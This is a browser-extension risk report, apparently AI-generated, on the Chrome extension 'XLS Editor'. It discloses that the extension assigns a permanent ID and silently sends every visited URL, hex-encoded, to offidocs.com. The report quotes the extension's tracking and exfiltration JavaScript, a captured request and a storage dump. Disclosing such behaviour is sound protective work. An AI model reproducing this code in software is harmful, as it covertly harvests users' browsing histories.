Is XLS Editor safe?

High risk

XLS Editor is high risk. On first run, this extension generates a random 10-character ID stored permanently, attached to every URL report sent to offidocs.com. This links every page you visit into one profile tied to your install, with no way to reset it.…

officeonlinesystemsv2.15.2Chrome Web Store
75Risk
Who publishes it

officeonlinesystems - 26 other listings from the same operator, 17 of them carrying a finding

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
officeonlinesystems
Registered address
Av. Dr. Arce 43, Madrid 28002, Spain

Shared hosts - 1 hostname

Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.

offidocs.com
Also called by 7 other listings, including Image editor PaintMagick for photos, PhotoStudio, Encrypt any email with CipherMail

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI SANDBOX

Extension assigns a permanent tracking ID to your browser install

On first run, this extension generates a random 10-character ID stored permanently, attached to every URL report sent to offidocs.com.

This links every page you visit into one profile tied to your install, with no way to reset it.

01EvidenceCAUSE EFFECT
What actually happens
You did this

The extension installs and runs for the first time on your browser.

The extension did this

It generates a permanent random identifier and stores it locally, then appends it to every URL report sent to offidocs.com.

The ID is never displayed to you and has no visible reset mechanism in the extension UI.

02EvidenceSTORAGE DUMP
What's stored on your device

'username' is the permanent tracking ID sent with every navigation report. 'offidocscloud' controls URL exfil (1=on, 0=off); default is 1.

Locationchrome.storage.local key 'offidocs_key'
Contents (JSON)
{
  "username": "a7kx2mq9nf",
  "offidocscloud": "1"
}
03EvidenceCODE COMPARE
The code that does this

Tracking ID generation and persistence (websecure.js:60-95)

What it actually does
async function extractaudio(urlxx) {
  const offidocs_key = 'offidocs_key';
  var datax = { username: null, offidocscloud: null };
  var username = '';

  // Load stored data
  let storageResult = await chrome.storage.local.get([offidocs_key]);
  if (offidocs_key in storageResult) {
    datax = storageResult[offidocs_key];
  }

  // Generate and persist tracking ID if not present
  if (datax.username) {
    username = datax.username;
  } else {
    username = '' + randomString(10) + ''.toLowerCase(); // new persistent ID
    datax.username = username;
  }

  // Default tracking to enabled
  if (datax.offidocscloud) {
    offidocscloud = datax.offidocscloud;
  } else {
    offidocscloud = '1';   // enabled by default
    datax.offidocscloud = '1';
  }

  // Persist changes
  var data = {};
  data[offidocs_key] = datax;
  await chrome.storage.local.set(data);

  var un = username;
  if (datax.offidocscloud == '0') return;  // opt-out gate

  // Send URL + tracking ID to offidocs.com
  let cfgv = await fetch(
    'https://www.offidocs.com/media/system/app/checkdownloadxlseditorx_2_nav.php'
    + '?filepath=' + bin2hex(urlxx)
    + '&hex=1&u=' + un
    + '&s=' + servicexx
  );
}
04EvidenceTHIRD PARTY LIST
Where the tracking ID is transmitted
  • www.offidocs.com

    Receives the persistent user tracking ID as the &u= parameter on every URL navigation report. The same operator publishes this extension.

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI SANDBOX

Extension reports every URL you visit to offidocs.com in real time

Every time you navigate, this extension sends the page's full URL, hex-encoded, to offidocs.com with a persistent install ID, automatically, with no indicator.

A popup opt-out exists, but tracking defaults on and most users never see it.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You navigate to any website, any page, on any domain.

The extension did this

The extension encodes the full URL and sends it to offidocs.com with your persistent user ID.

This happens automatically on every navigation, with no UI indication and no per-site allowlist.

02EvidenceFIELD TABLE
Data sent in each request to offidocs.com
FieldValueWhy it matters
The URL you are visiting
https://mail.google.com/mail/u/0/#inbox/FMfcgzQZTkFprjVlMQnXzSlkbPMknRpgThe full address of every page you navigate to, including query strings and path.
Your persistent user ID
a7kx2mq9nfA 10-character random identifier generated on first run and stored permanently, used to link all your browsing reports together.
03EvidenceOPAQUE REVEAL
Why you can't catch this in DevTools

The visited URL is hex-encoded by bin2hex() before being placed in the filepath= query parameter. The server receives the hex string and can decode it to the original URL.

What's actually being sent
https://mail.google.com/mail/u/0/#inbox/FMfcgzQZTkFprjVlMQnXzSlkbPMknRpg
04EvidenceNETWORK CAPTURE
Captured request
GEThttps://www.offidocs.com/media/system/app/checkdownloadxlseditorx_2_nav.php?filepath=68747470733a2f2f6d61696c2e676f6f676c652e636f6d2f6d61696c2f752f302f23696e626f78&hex=1&u=a7kx2mq9nf&s=
05EvidenceCODE COMPARE
The code that does this

Navigation listener → URL exfil path (websecure.js)

What it actually does
function getTabInfo(tabId) {
  chrome.tabs.get(tabId, function(tab) {
    if (
      (tab.url.indexOf('offidocs') == -1) &&
      (tab.url.indexOf('http') !== -1) &&
      (lastUrl != tab.url)
    ) {
      urlx = tab.url;
      extractaudio(urlx);  // encodes + sends URL to offidocs.com
      lastUrl = tab.url;
    }
  });
}
06EvidenceTHIRD PARTY LIST
Where your browsing history is sent
  • www.offidocs.com

    Receives the hex-encoded visited URL and persistent user ID on every page navigation. offidocs.com is operated by the same developer who publishes this extension.

SeverityMEDIUM
ClassUNWANTED
TypeUnexpected
CWECWE-200
SourceAI SANDBOX

Popup Fetches File List From Browsing History

Opening the XLS Editor popup sends a GET to offidocs.com with the stored user ID.

The service-worker path reporting visited URLs uses the same ID, letting the popup endpoint return a server-selected HTML file list tied to that activity.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You open the XLS Editor popup or click its Detection control.

The extension did this

The extension asks offidocs.com for a file list tied to the stored user identifier.

The response is written directly into the popup area labeled as files detected in the current webpage.

02EvidenceFIELD TABLE
Fields connected by the popup and background code
FieldValueWhy it matters
Stored user ID
x7k2m9q4az (illustrative)Lets the server connect the popup request to the same browser profile over time.
Visited page URL
https://docs.example.com/reports/q2.xlsx (illustrative)Shows which pages were visited before the popup asks for matching files.
Returned file-list HTML
<a href="https://www.offidocs.com/media/system/app/view_edit_xlseditor_nav.php?filepath=68747470733a2f2f646f63732e6578616d706c652e636f6d2f7265706f7274732f71322e786c7378&u=x7k2m9q4az">q2.xlsx</a> (illustrative)Controls what file links the popup displays after it asks the server for detected files.
03EvidenceNETWORK CAPTURE
Captured request
GEThttps://www.offidocs.com/media/system/app/checkdownloadxlseditorr_2_nav.php?u=x7k2m9q4az
HTML response used as the popup's detected-file list when the server returns 200 OK.
04EvidenceCODE COMPARE
The code that does this

Popup fetches a server file list; service worker reports visited URLs

What it actually does
Readable popup request logicpopup.js
var xhr1 = new XMLHttpRequest();
xhr1.open('GET', 'https://www.offidocs.com/media/system/app/checkdownloadxlseditorr_2_nav.php?u=' + username, true);
xhr1.onload = function (e) {
    if (xhr1.readyState === 4) {
        if (xhr1.status === 200) {
            //console.log(xhr1.responseText);
            var response1 = xhr1.responseText;
            listfilesx = document.getElementById('listfilesx');
            listfilesx.innerHTML = "<p>List of files detected in this webpage. Click to edit:</p> " + response1;
        } else {
            listfilesx = document.getElementById('listfilesx');
            listfilesx.innerHTML = "<p>No files detected</p>";
        }
    }
};
xhr1.onerror = function (e) {
    listfilesx = document.getElementById('listfilesx');
    listfilesx.innerHTML = "<p>No files detected</p>";
};
xhr1.send();
Readable URL reporting logicwebsecure.js
function getTabInfo(tabId) {
      chrome.tabs.get(tabId, function(tab) {
            if ( ( tab.url.indexOf("offidocs") == -1 ) && ( tab.url.indexOf("http") !== -1 ) && ( lastUrl != tab.url) )  {
                    //console.log(" Changed tab.url " + tab.url);
                    urlx =  tab.url;
                    extractaudio(urlx);
                    lastUrl = tab.url;
            }
      });
}

function websecure() {
    this.init = function () {
        chrome.tabs.onActivated.addListener(function(activeInfo) {
                activeTabId = activeInfo.tabId;
                getTabInfo(activeTabId);
        });

        chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
                //if(activeTabId == tabId) {
                    getTabInfo(tabId);
                //}
        });
    };
}

async function extractaudio(urlxx) {
                const offidocs_key = "offidocs_key";
                var datax = { username: null,  offidocscloud: null };
                var username = "";
                var offidocscloud = "";
                let storageResult = await chrome.storage.local.get([offidocs_key]);
                if (offidocs_key in storageResult) {
                        datax = storageResult[offidocs_key]
                }

                if ( datax.username ) {
                    username = datax.username;
                }
                else {
                    username = "" + randomString(10) + "".toLowerCase();
                    datax.username = username;
                }
                if ( datax.offidocscloud ) {
                    offidocscloud = datax.offidocscloud;
                }
                else {
                    offidocscloud = "1";
                    datax.offidocscloud = "1";
                }

                var data = {};
                data[offidocs_key] = datax;
                await chrome.storage.local.set(data);

                var un = username;
                if ( datax.offidocscloud == "0")
                    return;

                let cfgv = await fetch('https://www.offidocs.com/media/system/app/checkdownloadxlseditorx_2_nav.php?filepath=' + bin2hex(urlxx) + '&hex=1&u=' + un + "&s=" + servicexx);

                if (cfgv.status === 200) {
                    let fbv = await cfgv.text();
                    //console.log(fbv);
                    var nbv = fbv;
                    if ( nbv.indexOf("302") !== -1 )   {
                           var ybv = 'https://www.offidocs.com/media/system/app/view_edit_xlseditor_nav.php?filepath=' + bin2hex(urlxx) + '&u=' + un;
                            //chrome.tabs.create({ url: ybv });
                           chrome.tabs.update(chrome.tabs.getCurrent().id, {url: ybv});
                    }
                }
}

function bin2hex (bin)
{
  var i = 0, l = bin.length, chr, hex = ''
  for (i; i < l; ++i)
  {
    chr = bin.charCodeAt(i).toString(16)
    hex += chr.length < 2 ? '0' + chr : chr
  }
  return hex
}
05EvidenceTHIRD PARTY LIST
Remote host receiving and returning the linked data
  • www.offidocs.com

    Receives the stored user identifier and visited-page URL reports, then returns the popup file-list HTML.

What it can do

Permissions this extension asks for, as declared in version 2.15.2. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Store data in your browser

    storage

  • See the address and title of every tab you have open

    tabs

Updated 30 September 2026iobjaooppmgjlgomfpaohhncpfjpigaf